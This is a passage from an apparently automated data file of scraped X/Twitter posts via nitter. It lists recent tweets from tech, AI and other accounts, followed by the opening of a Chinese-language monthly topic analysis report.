shitcoin that's drifting to zero or trad…\n[原文链接](https://nitter.net/CryptoCred/status/2039995911384752540#m)\n\n**[2026-04-02T20:03:46+00:00]**\n> Wtf\n[原文链接](https://nitter.net/CryptoCred/status/2039795951095714268#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(19 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n**[2026-04-22T02:03:48+00:00]**\n> RT by @satoshibun: they're about to start making out\n[原文链接](https://nitter.net/savanaclavv/status/2046771924064186549#m)\n\n**[2026-04-18T01:18:33+00:00]**\n> RT by @satoshibun: CATER DIAMOND YOU ARE NOT SAFE AROUND ME\n[原文链接](https://nitter.net/jankacest/status/2045310986412781730#m)\n\n**[2026-04-17T19:29:44+00:00]**\n> RT by @satoshibun: 🤤\n[原文链接](https://nitter.net/jankacest/status/2045223202381508777#m)\n\n**[2026-04-07T04:52:37+00:00]**\n> RT by @satoshibun: It really bugs me\n[原文链接](https://nitter.net/XxHerobrineJrxX/status/2041378590948986948#m)\n\n**[2026-04-05T23:35:20+00:00]**\n> SATOSHI OH MY HEART\n[原文链接](https://nitter.net/satoshibun/status/2040936354708631955#m)\n\n**[2026-04-05T01:17:07+00:00]**\n> RT by @satoshibun: asTRO and meisTRO— #Dandysworld #Dollysfactory\n[原文链接](https://nitter.net/SnipeCap34/status/2040599580002435292#m)\n\n**[2026-04-04T16:08:28+00:00]**\n> RT by @satoshibun: 📢<ぴえん猫ぬいぐるみ 予約開始🥺 アニメ『NEEDY GIRL OVERDOSE』より ”ぴえん猫”がぬいぐるみとなって登場! 色んな場所へぜひ一緒におでかけください🥺 🎀ご予約はこちら https://online.aniplex.co.jp/itemDInljwhS.html\n[原文链接](https://nitter.net/aniplex_plus/status/2040461508497596862#m)\n\n**[2026-04-04T12:07:57+00:00]**\n> RT by @satoshibun: 蔓沢つた子個展 『Vine Garden』の開催、ご来場、誠にありがとうございました! 終わるのが本当に本当に寂しかったです😭 また素敵な機会をいただけるように漫画を描き続けていきたいと思います🌱 キービジュ アフターを添えて🌸\n[原文链接](https://nitter.net/tsutako25/status/2040400983713550680#m)\n\n**[2026-04-03T14:55:06+00:00]**\n> RT by @satoshibun: I love when you can see the influence from Free! (Makoharu & Sourin) in BL\n[原文链接](https://nitter.net/sskslov/status/2040080657175736513#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(5 条)\n\n**[2026-04-15T16:16:38+00:00]**\n> New course: Spec-Driven Development with Coding Agents, built in partnership with @jetbrains, and taught by @paulweveritt. Vibe coding is fast, but often produces code that doesn't match what you ask…\n[原文链接](https://nitter.net/AndrewYNg/status/2044449830605582629#m)\n\n**[2026-04-14T16:22:22+00:00]**\n> I'm excited about voice as a UI layer for existing visual applications — where speech and screen update together. This goes well beyond voice-only use cases like call center automation. The barrier h…\n[原文链接](https://nitter.net/AndrewYNg/status/2044088884989177991#m)\n\n**[2026-04-13T17:24:23+00:00]**\n> As AI agents accelerate coding, what is the future of software engineering? Some trends are clear, such as the Product Management Bottleneck, referring to the idea that we are more constrained by dec…\n[原文链接](https://nitter.net/AndrewYNg/status/2043742105852621052#m)\n\n**[2026-04-09T17:11:58+00:00]**\n> New course: Efficient Inference with SGLang: Text and Image Generation, built in partnership with LMSys @lmsysorg and RadixArk @radixark, and taught by Richard Chen @richardczl, a Member of Technical…\n[原文链接](https://nitter.net/AndrewYNg/status/2042289428702642588#m)\n\n**[2026-03-31T18:45:23+00:00]**\n> The anti-AI coalition continues to maneuver to find arguments to slow down AI progress. If someone has a sincere concern about a specific effect of AI, for instance that it may lead to human extincti…\n[原文链接](https://nitter.net/AndrewYNg/status/2039051446084153834#m)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(19 条)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n**[2026-04-15T20:13:12+00:00]**\n> It was a delight to serve on the selection committee with an awesome group of committee members. We had lots of great submissions to evaluate and excellent discussions during our selection process. Y…\n[原文链接](https://nitter.net/JeffDean/status/2044509365164773818#m)\n\n**[2026-04-15T16:13:28+00:00]**\n> R to @JeffDean: In case it's not clear, you can click on the picture in the first image to learn more about Ricardo and the award: Twitter swallowed my actual link text to https://awards.acm.org/abou…\n[原文链接](https://nitter.net/JeffDean/status/2044449033490760085#m)\n\n**[2026-04-15T16:12:19+00:00]**\n> Delighted to see that Ricardo Baeza-Yates (@PolarBearby) is this year's winner of the @TheOfficialACM Luiz Barroso Award (an award named in honor of my longtime Google colleague). Ricardo is widely r…\n[原文链接](https://nitter.net/JeffDean/status/2044448743811129716#m)\n\n**[2026-04-15T16:07:45+00:00]**\n> RT by @JeffDean: Introducing Gemini 3.1 Flash TTS 🗣️, our latest text to speech model with scene direction, speaker level specificity, audio tags, more natural + expressive voices, and support for 70…\n[原文链接](https://nitter.net/OfficialLoganK/status/2044447596010435054#m)\n\n**[2026-04-14T15:06:50+00:00]**\n> RT by @JeffDean: We’re rolling out an upgrade designed to help robots reason about the physical world. 🤖 Gemini Robotics-ER 1.6 has significantly better visual and spatial understanding in order to p…\n[原文链接](https://nitter.net/GoogleDeepMind/status/2044069878781390929#m)\n\n**[2026-04-12T23:52:16+00:00]**\n> RT by @JeffDean: Artemis II astronaut Victor Glover received a hero's welcome from his neighbors! 🇺🇸\n[原文链接](https://nitter.net/OwenSparks/status/2043477332438958253#m)\n\n**[2026-04-11T04:16:18+00:00]**\n> This is so awesome! When I was a kid, when the Apollo mission were still relatively fresh in the recent past, I just assumed we would send people & missions to the moon quite regularly. Hard to belie…\n[原文链接](https://nitter.net/JeffDean/status/2042819001815126233#m)\n\n**[2026-04-11T00:29:48+00:00]**\n> RT by @JeffDean: Yet another inspiration to women in STEM. Christina Koch is her name🌑\n[原文链接](https://nitter.net/Ms_Dhaey/status/2042762001873502676#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(9 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n**[2026-04-13T18:05:21+00:00]**\n> Just like us at @thinkymachines, @luke_drago_ @LRudL_ care a lot about amplifying humans, not replacing them. They're joining us to build towards that future!\n[原文链接](https://nitter.net/soumithchintala/status/2043752413085966574#m)\n\n**[2026-04-13T05:30:31+00:00]**\n> RT by @soumithchintala: $200/month is enough to buy an H100 GPU for 6 hours every workday\n[原文链接](https://nitter.net/ekzhang1/status/2043562453452128359#m)\n\n**[2026-04-11T03:17:43+00:00]**\n> RT by @soumithchintala: OpenAI is nothing without its people https://geohot.github.io//blog/jekyll/update/2026/04/11/openai-people.html\n[原文链接](https://nitter.net/geohotarchive/status/2042804258584580211#m)\n\n**[2026-04-09T19:53:32+00:00]**\n> RT by @soumithchintala: We’ve redesigned our docs with easy access to SDK reference, tutorials, support, and our newly updated cookbook---v0.3.0! Whether you’re writing your first training loop in Ti…\n[原文链接](https://nitter.net/tinkerapi/status/2042330088130441337#m)\n\n**[2026-04-03T01:39:41+00:00]**\n> RT by @soumithchintala: This work from @voooooogel was pretty ground-breaking: https://vgel.me/posts/representation-engineering/\n[原文链接](https://nitter.net/jeremyphoward/status/2039880485036544422#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: URLError: \n\n### ✅ @Ronald_vanLoon — Ronald van Loon(20 条)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-27T11:20:17+00:00]**\n> Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m)\n\n**[2026-04-27T10:56:01+00:00]**\n> You’re about to feel the #AI money squeeze by Hayden Field @verge Learn more: https://bit.ly/3QwH0fu #ArtificialIntelligence #MachineLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m)\n\n**[2026-04-27T10:50:49+00:00]**\n> Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power by @XueJia24682 #Robotics #EmergingTech #Technology #Innovation\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m)\n\n**[2026-04-27T10:18:11+00:00]**\n> Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery by @IntEngineering #Innovation #EmergingTech #Tech #Technology #TechForGood\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m)\n\n**[2026-04-27T09:43:13+00:00]**\n> Tiny Pacemaker, Big Impact: A Breakthrough in Cardiac Care by @pascal_bornet #HealthTech #Innovation #EmergingTech #TechForGood #Tech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048699478094315671#m)\n\n**[2026-04-27T09:19:05+00:00]**\n> This Smart Trash Can Tracks and Catches Thrown Garbage Automatically by @IamKyros69 #EmergingTech #Innovation #TechForGood #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048693406138851388#m)\n\n**[2026-04-27T08:45:03+00:00]**\n> Is it time to worry about compute scarcity? by @antgrasso #ArtificialIntelligence #IT #Tech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048684842036978024#m)\n\n**[2026-04-27T08:27:08+00:00]**\n> Real-Life Beetle Bot: Six-Legged Walking #Robot in Action via @ZappyZappy7 #Robotics #MachineLearning #ArtificialIntelligence #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048680331864100997#m)\n\n**[2026-04-23T08:27:04+00:00]**\n> RT by @Ronald_vanLoon: Rapid-Deploy Foldable Solar Panels Deliver Instant Off-Grid Power by @amazingthings_ #Sustainability #RenewableEnergy #CleanEnergy\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047230765193207816#m)\n\n**[2026-04-23T07:48:01+00:00]**\n> RT by @Ronald_vanLoon: #AI-generated #Sensors open new paths for early cancer detection by Anne Trafton @MIT Learn more: https://bit.ly/4pvlBPL #MedTech #Healthcare #HealthTech #Tech #TechForGood\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047220936902861168#m)\n\n**[2026-04-23T07:27:06+00:00]**\n> RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom by @rivr_tech #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m)\n\n**[2026-04-23T06:57:05+00:00]**\n> RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions by @IntEngineering #Robotics #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(20 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n**[2026-04-20T15:07:11+00:00]**\n> Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others.…\n[原文链接](https://nitter.net/erikbryn/status/2046244291945927102#m)\n\n**[2026-04-18T19:33:41+00:00]**\n> R to @erikbryn: Here's the course: https://www.masterclass.com/classes/revolutionize-your-workflows-with-ai\n[原文链接](https://nitter.net/erikbryn/status/2045586582879764872#m)\n\n**[2026-04-18T19:33:19+00:00]**\n> AI should have been named IA. Millions more people would have embraced it to boost their everyday performance. It's something I discuss in my new @MasterClass\n[原文链接](https://nitter.net/erikbryn/status/2045586493494989066#m)\n\n**[2026-04-17T19:30:17+00:00]**\n> RT by @erikbryn: The Universal High Income Power Map ft. @elonmusk, @AndrewYang, @erikbryn\n[原文链接](https://nitter.net/ADINresearch/status/2045223340420272212#m)\n\n**[2026-04-17T18:03:04+00:00]**\n> RT by @erikbryn: AI assistants don’t just answer questions anymore; they jump in with suggestions. Does this generally improve worker's quality of output or hurt it? How do these effects vary by expe…\n[原文链接](https://nitter.net/StanfordHAI/status/2045201392739205391#m)\n\n**[2026-04-17T00:58:55+00:00]**\n> AI can power small teams to boost output, write @saraheneedleman in @BusinessInsider. https://africa.businessinsider.com/careers/snaps-layoffs-highlight-growing-work-trend-ai-powered-tiny-teams/xw8st…\n[原文链接](https://nitter.net/erikbryn/status/2044943654486462558#m)\n\n**[2026-04-16T16:34:38+00:00]**\n> R to @erikbryn: Here's the course: https://www.masterclass.com/classes/revolutionize-your-workflows-with-ai\n[原文链接](https://nitter.net/erikbryn/status/2044816749720432652#m)\n\n**[2026-04-16T16:33:12+00:00]**\n> Most people are only getting a fraction of the value they could be getting from AI tools. It's a huge \"capabilities overhang\". Along with the amazing Cat Goetze and Parth Patil, I've created a @Maste…\n[原文链接](https://nitter.net/erikbryn/status/2044816389521969353#m)\n\n**[2026-04-16T00:16:09+00:00]**\n> RT by @erikbryn: What a pleasant surprise to see the former Prime Minister of #UK (@RishiSunak) post about the @Stanford paper on Enterprise #AI I co-authored. 💡 @erikbryn @elisacmpereira1 @DigEconLa…\n[原文链接](https://nitter.net/AGraylin/status/2044570504577855699#m)\n\n**[2026-04-15T20:31:16+00:00]**\n> RT by @erikbryn: Very excited to share that our project was selected as a @LaudeInstitute Moonshots seed grant winner on workforce upskilling @tatsu_hashimoto @erikbryn This is something I think abou…\n[原文链接](https://nitter.net/Diyi_Yang/status/2044513911484125496#m)\n\n**[2026-04-15T18:44:08+00:00]**\n> RT by @erikbryn: “Collaborative Intelligence for the Future of Work” from Lab Director @erikbryn, @tatsu_hashimoto and @Diyi_Yang has an ambitious plan for policymakers, workers and institutions to g…\n[原文链接](https://nitter.net/DigEconLab/status/2044486951290716635#m)\n\n**[2026-04-15T17:30:36+00:00]**\n> RT by @erikbryn: Workforce Reskilling track: Research that helps people adapt to labor market shifts through retraining, upskilling, and lifelong learning. 🤖Collaborative Intelligence for the Future …\n[原文链接](https://nitter.net/LaudeInstitute/status/2044468446696731011#m)\n\n**[2026-04-13T21:09:34+00:00]**\n> See data on the net flow of AI authors and inventors and thousands of other insights in the #AIIndex2026, released today.\n[原文链接](https://nitter.net/erikbryn/status/2043798774699683995#m)\n\n**[2026-04-13T16:36:20+00:00]**\n> RT by @erikbryn: Dean Pomerleau was working on self-driving cars decades before Teslas and Waymos hit the streets. @tommmitchell dives into the surprising early history of autonomous driving in the l…\n[原文链接](https://nitter.net/DigEconLab/status/2043730014798225488#m)\n\n---\n\n### ✅ @liuliu — 刘进(14 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n**[2026-04-17T18:37:25+00:00]**\n> You cannot believe how much intrinsic knowledge GPT-5.4 has about building GPU compute kernels. I honestly think this will materially impact NVIDIA's lead in software.\n[原文链接](https://nitter.net/liuliu/status/2045210034813186142#m)\n\n**[2026-04-16T19:47:19+00:00]**\n> M4 is faster (since a few days ago): https://engineering.drawthings.ai/p/making-apple-neural-engine-work-in\n[原文链接](https://nitter.net/liuliu/status/2044865239532163122#m)\n\n**[2026-04-16T17:17:18+00:00]**\n> R to @liuliu: Image\n[原文链接](https://nitter.net/liuliu/status/2044827486220111890#m)\n\n**[2026-04-16T17:17:18+00:00]**\n> Hold my beer:\n[原文链接](https://nitter.net/liuliu/status/2044827484823412831#m)\n\n**[2026-04-14T17:53:21+00:00]**\n> Apparently, this continues for M5 users too.\n[原文链接](https://nitter.net/liuliu/status/2044111782839759304#m)\n\n**[2026-04-11T18:58:41+00:00]**\n> Download to double your FLOPs on your M4s.\n[原文链接](https://nitter.net/liuliu/status/2043041062265196703#m)\n\n**[2026-04-07T18:04:24+00:00]**\n> LLM not only made it harder to write, also made it harder to read. Once you knew it is done by a LLM for an opinion piece, you know it is uninteresting and you would better off to just ask LLM direct…\n[原文链接](https://nitter.net/liuliu/status/2041577848620908756#m)\n\n**[2026-04-06T03:36:40+00:00]**\n> Show some love to base M4.\n[原文链接](https://nitter.net/liuliu/status/2040997087320662033#m)\n\n**[2026-04-03T20:21:06+00:00]**\n> When getting more taste of training with quantized kernels, you would appreciate more of FP8 and skeptical more to FP4.\n[原文链接](https://nitter.net/liuliu/status/2040162699313852876#m)\n\n**[2026-04-02T00:15:09+00:00]**\n> Day 5: https://releases.drawthings.ai/p/introducing-mediagenerationkit-hybrid\n[原文链接](https://nitter.net/liuliu/status/2039496823396769803#m)\n\n**[2026-04-01T00:53:47+00:00]**\n> Day 4: https://releases.drawthings.ai/p/metal-quantized-attention-pulling\n[原文链接](https://nitter.net/liuliu/status/2039144158917702114#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T13:39:25.780249+00:00\n**分析账号**: 33个 | **活跃账号**: 17个 | **推文总量**: 286条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:193 条\n- **模型能力**:54 条\n- **交易与市场**:15 条\n- **算力与芯片**:13 条\n- **投融资与并购**:11 条\n\n## 三、活跃账号 Top10\n\n- @DavidSacks: 22 条\n- @sama: 20 条\n- @Ronald_vanLoon: 20 条\n- @paulg: 20 条\n- @ylecun: 20 条\n- @eladgil: 20 条\n- @erikbryn: 20 条\n- @GaryMarcus: 19 条\n- @HarryStebbings: 19 条\n- @jason: 19 条\n\n## 四、代表性推文\n\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the 